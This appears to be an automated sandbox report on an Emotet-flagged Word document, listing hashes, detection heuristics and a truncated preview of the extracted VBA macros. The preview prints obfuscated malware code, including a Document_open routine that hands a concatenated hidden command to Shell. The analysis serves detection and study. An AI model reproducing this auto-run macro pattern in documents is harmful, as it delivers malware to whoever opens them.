Emotet Office (OLE) malware analysis — malicious · 086d50d91d2eff79

MALICIOUS

Office (OLE)

255.5 KB Created: 2018-07-18 07:03:00 Authoring application: Microsoft Office Word First seen: 2018-07-27

MD5: d7d6b2bfb116b8dbbea44b7d6b2cec95 SHA-1: 8016b8703face54adacbf29dbe9c00b0d38c2f33 SHA-256: 086d50d91d2eff79d61b97a95a168c0ff5f99ce34e75a27649ffb68d3ef78ef4

182 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The file is identified as malicious by ClamAV with a specific Emotet signature. Static analysis revealed the presence of VBA macros, including a Document_Open macro and a critical Shell() call, indicating an attempt to execute arbitrary code. This functionality is consistent with Emotet's typical behavior of downloading and executing further malicious payloads.

Heuristics 5

ClamAV: Doc.Downloader.Emotet-6958940-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-6958940-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 56816 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	56816 bytes
SHA-256: `648843d0e8f25e33e71531a2f56a3d971f9c12919ba9953e9bdc2abfcb334864`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "uhEPuEYHTzNf" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Function IndbftHBClqM() On Error Resume Next UCwXps = 10770 + SuhQG - (74870 * cObGup / PRpjjz / 48648 + KCMkG - BQvZj - 6722 - jJXCb * (19196 / HcsZv / mhhFII - HkiDVj)) HwHUo = 50843 + jbROYR - (45195 * zQwGA / pGhzJj / 95666 + NOcCMY - PwuIds - 95095 - LhOBh * (40284 / UAnkRp / UirnI - DlWEz)) HFPXUc = 53933 + rYwwD - (54444 * VOZdj / fjwzO / 93770 + lWhfp - JOZHF - 79595 - kvFfj * (81437 / fjWQii / bZSZF - ZmUrRG)) QPwis = 5829 + wpiWV - (4024 * tJnRzz / XPufX / 70255 + GIfhBd - qEALq - 60634 - JSfYb * (87900 / YpVPCv / zBwUSq - jwoTYw)) jwZuS = 32803 + HZrvJ - (7723 * cnbtFt / dmazQW / 74540 + zJSWr - VWMza - 2176 - GolTuB * (70522 / FAfEt / JwwCu - rZhcnM)) wjhLma = 60901 + ShInP - (6642 * JnpOfU / pQbGuz / 59164 + juiiJ - LOJSGa - 29496 - AUhDD * (40718 / jRvGQ / Rjffjc - BNEhuk)) End Function Private Function diDJjwmRLckF() On Error Resume Next RbZPkS = 6107 + ZjHdzi - (84023 * dRhji / hRriuV / 12750 + XJiDbt - tUiYVl - 39553 - aZfADK * (2564 / GzktIX / YhibI - vvGzUj)) csLVXl = 6552 + pEMZo - (27419 * TKJiLr / QAKWzz / 63376 + MHmViI - siFvHI - 26294 - lqpVh * (87482 / FJEBb / LAoEY - sFnSf)) TASOcr = 69213 + NVdsGf - (908 * bjrXl / nUvEj / 10583 + wUZOV - EYjYV - 1672 - Rifqs * (13317 / KAAOF / zNzSYK - DRBEik)) qQWTsK = 75895 + NtPnj - (54276 * bVtrPp / CmIDO / 47226 + lFrkl - hWkEfK - 69120 - BBtDV * (22900 / AcMhmb / kKowO - boXDvk)) koMEF = 91535 + lOAsM - (81534 * diCzQU / ZPivAr / 25670 + qIlNZQ - AchfLw - 93067 - DCsqKs * (217 / TdSKYd / EDnHX - HwQUpi)) CTBPb = 778 + IVZvLk - (18535 * mNZIj / DfUUK / 37374 + KdTZqj - dvzCp - 76509 - QbHav * (62081 / izsEz / wojvQj - zrFVVE)) IIvNkR = 18709 + VDmWL - (53086 * rAYVS / qnKMi / 59916 + ZCibDw - rpjXGr - 17984 - fommT * (85785 / zwNip / UlACm - pSULSN)) End Function Private Function hzXczflhKP() On Error Resume Next IQoui = 5559 + mKAPL - (4076 * QDwQB / CFUtit / 57727 + BhrBO - KYKNi - 30362 - jmXjZ * (72450 / ocpCGw / DvvQk - qkcIO)) mdjUFK = 18114 + ivscE - (62082 * JiKMU / UjLYUW / 42746 + CHZUK - CtpPh - 33095 - iWKJI * (39383 / pzIIS / SwYwl - nFjoTI)) lkGor = (73673 - fEuIlw - 27381 + 20244 / XBEjZt - BHfcK / 40808 + ajQRCl - (23504 / iwdSU)) AGOvoZ = 49947 + dpwwnr - (63789 * sqRiR / DvXDB / 41049 + lrSsw - fKHNma - 15429 - EJFsZk * (8111 / Ozrif / SXkYE - rwiFrz)) aDNWi = 63469 + RLClYv - (96648 * AIjEPW / rNaQm / 62718 + flTwu - diNjzB - 53702 - Rnlmzj * (28401 / umYCCM / wOuGE - QSbAFQ)) rrtlmm = 73826 + TwNFI - (87098 * ZspuQA / dOztq / 34611 + JORbst - iDPTMm - 69951 - hKcfPK * (70706 / ThskN / otvUZK - vdPAdq)) End Function Private Sub Document_open() On Error Resume Next hFwwh = 85001 * ncqYZ * (19209 - 52104 / vMzAzb * 93779 + 62855 - ChHHXw - 13429 - Kviip) wRAdd = 19304 * jsLCN * (72744 - 26533 / jTiFzL * 45572 + 98915 - DmjDX - 51916 - UwYFAZ) GVPQUv = 65643 * wofiz * (62007 - 23489 / lXjBS * 49870 + 3514 - KWjKAv - 71432 - wvIlmR) Shell "" + rziiKtt + SUSSpjkYTuzlwP + CVar("c") + VOOsOGChuGiR + IoOMEdokV + TzZKaD + diAOErhdzvs + OQQLaYbWwY + cGFdzh + zFTJOR + kdrbu + bCTYd + KwccufCmaC + MQBTGJw + URNYi + wJZUkarv + UnEZus + GYLbRiH + KmpHbDFPv + SfERZzc + BzLqDwjDX + GlhYZuLS + fBDRCzJu + nNjoPvjdIHu + kOMlwhJvY + zlFJUjKATl + iEfnPYzu + sUDQU + AfzvfwdOokO + GDRosXH + cRHLczYSw, 0 dLIRfi = 32132 * IdGvW * (10639 - 83097 / FKKfi * 91270 + 75928 - JXJTZh - 66763 - wQWvuA) End Sub Private Function iNAODijP() On Error Resume Next YKVNG = XuLaDU - 74772 - 68394 / qfCqR + (13589 - OIzPv - sFcMJu + VBatAf) mmmNS = TUJdP - 32348 - 48008 / CTiww + (26407 - zDjWnz - DCcBIb + GomsVB) fwuiJ = iHOFG - 16126 - 50239 / Hucma + (49226 - btazLW - JOBal + KirZKY) kfzjf = GTYUcm - 37690 - 41082 / ivYAR + (31193 - FpblEU - zaAssV + LbPlPq) End Func ... (truncated)

SHA-256: 648843d0e8f25e33e71531a2f56a3d971f9c12919ba9953e9bdc2abfcb334864

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "uhEPuEYHTzNf"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function IndbftHBClqM()
On Error Resume Next
   UCwXps = 10770 + SuhQG - (74870 * cObGup / PRpjjz / 48648 + KCMkG - BQvZj - 6722 - jJXCb * (19196 / HcsZv / mhhFII - HkiDVj))
   HwHUo = 50843 + jbROYR - (45195 * zQwGA / pGhzJj / 95666 + NOcCMY - PwuIds - 95095 - LhOBh * (40284 / UAnkRp / UirnI - DlWEz))
   HFPXUc = 53933 + rYwwD - (54444 * VOZdj / fjwzO / 93770 + lWhfp - JOZHF - 79595 - kvFfj * (81437 / fjWQii / bZSZF - ZmUrRG))
   QPwis = 5829 + wpiWV - (4024 * tJnRzz / XPufX / 70255 + GIfhBd - qEALq - 60634 - JSfYb * (87900 / YpVPCv / zBwUSq - jwoTYw))
   jwZuS = 32803 + HZrvJ - (7723 * cnbtFt / dmazQW / 74540 + zJSWr - VWMza - 2176 - GolTuB * (70522 / FAfEt / JwwCu - rZhcnM))
   wjhLma = 60901 + ShInP - (6642 * JnpOfU / pQbGuz / 59164 + juiiJ - LOJSGa - 29496 - AUhDD * (40718 / jRvGQ / Rjffjc - BNEhuk))
End Function
Private Function diDJjwmRLckF()
On Error Resume Next
   RbZPkS = 6107 + ZjHdzi - (84023 * dRhji / hRriuV / 12750 + XJiDbt - tUiYVl - 39553 - aZfADK * (2564 / GzktIX / YhibI - vvGzUj))
   csLVXl = 6552 + pEMZo - (27419 * TKJiLr / QAKWzz / 63376 + MHmViI - siFvHI - 26294 - lqpVh * (87482 / FJEBb / LAoEY - sFnSf))
   TASOcr = 69213 + NVdsGf - (908 * bjrXl / nUvEj / 10583 + wUZOV - EYjYV - 1672 - Rifqs * (13317 / KAAOF / zNzSYK - DRBEik))
   qQWTsK = 75895 + NtPnj - (54276 * bVtrPp / CmIDO / 47226 + lFrkl - hWkEfK - 69120 - BBtDV * (22900 / AcMhmb / kKowO - boXDvk))
   koMEF = 91535 + lOAsM - (81534 * diCzQU / ZPivAr / 25670 + qIlNZQ - AchfLw - 93067 - DCsqKs * (217 / TdSKYd / EDnHX - HwQUpi))
   CTBPb = 778 + IVZvLk - (18535 * mNZIj / DfUUK / 37374 + KdTZqj - dvzCp - 76509 - QbHav * (62081 / izsEz / wojvQj - zrFVVE))
   IIvNkR = 18709 + VDmWL - (53086 * rAYVS / qnKMi / 59916 + ZCibDw - rpjXGr - 17984 - fommT * (85785 / zwNip / UlACm - pSULSN))
End Function
Private Function hzXczflhKP()
On Error Resume Next
   IQoui = 5559 + mKAPL - (4076 * QDwQB / CFUtit / 57727 + BhrBO - KYKNi - 30362 - jmXjZ * (72450 / ocpCGw / DvvQk - qkcIO))
   mdjUFK = 18114 + ivscE - (62082 * JiKMU / UjLYUW / 42746 + CHZUK - CtpPh - 33095 - iWKJI * (39383 / pzIIS / SwYwl - nFjoTI))
   lkGor = (73673 - fEuIlw - 27381 + 20244 / XBEjZt - BHfcK / 40808 + ajQRCl - (23504 / iwdSU))
   AGOvoZ = 49947 + dpwwnr - (63789 * sqRiR / DvXDB / 41049 + lrSsw - fKHNma - 15429 - EJFsZk * (8111 / Ozrif / SXkYE - rwiFrz))
   aDNWi = 63469 + RLClYv - (96648 * AIjEPW / rNaQm / 62718 + flTwu - diNjzB - 53702 - Rnlmzj * (28401 / umYCCM / wOuGE - QSbAFQ))
   rrtlmm = 73826 + TwNFI - (87098 * ZspuQA / dOztq / 34611 + JORbst - iDPTMm - 69951 - hKcfPK * (70706 / ThskN / otvUZK - vdPAdq))
End Function
Private Sub Document_open()
On Error Resume Next
   hFwwh = 85001 * ncqYZ * (19209 - 52104 / vMzAzb * 93779 + 62855 - ChHHXw - 13429 - Kviip)
   wRAdd = 19304 * jsLCN * (72744 - 26533 / jTiFzL * 45572 + 98915 - DmjDX - 51916 - UwYFAZ)
   GVPQUv = 65643 * wofiz * (62007 - 23489 / lXjBS * 49870 + 3514 - KWjKAv - 71432 - wvIlmR)
Shell "" + rziiKtt + SUSSpjkYTuzlwP + CVar("c") + VOOsOGChuGiR + IoOMEdokV + TzZKaD + diAOErhdzvs + OQQLaYbWwY + cGFdzh + zFTJOR + kdrbu + bCTYd + KwccufCmaC + MQBTGJw + URNYi + wJZUkarv + UnEZus + GYLbRiH + KmpHbDFPv + SfERZzc + BzLqDwjDX + GlhYZuLS + fBDRCzJu + nNjoPvjdIHu + kOMlwhJvY + zlFJUjKATl + iEfnPYzu + sUDQU + AfzvfwdOokO + GDRosXH + cRHLczYSw, 0
   dLIRfi = 32132 * IdGvW * (10639 - 83097 / FKKfi * 91270 + 75928 - JXJTZh - 66763 - wQWvuA)
End Sub
Private Function iNAODijP()
On Error Resume Next
   YKVNG = XuLaDU - 74772 - 68394 / qfCqR + (13589 - OIzPv - sFcMJu + VBatAf)
   mmmNS = TUJdP - 32348 - 48008 / CTiww + (26407 - zDjWnz - DCcBIb + GomsVB)
   fwuiJ = iHOFG - 16126 - 50239 / Hucma + (49226 - btazLW - JOBal + KirZKY)
   kfzjf = GTYUcm - 37690 - 41082 / ivYAR + (31193 - FpblEU - zaAssV + LbPlPq)
End Func
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.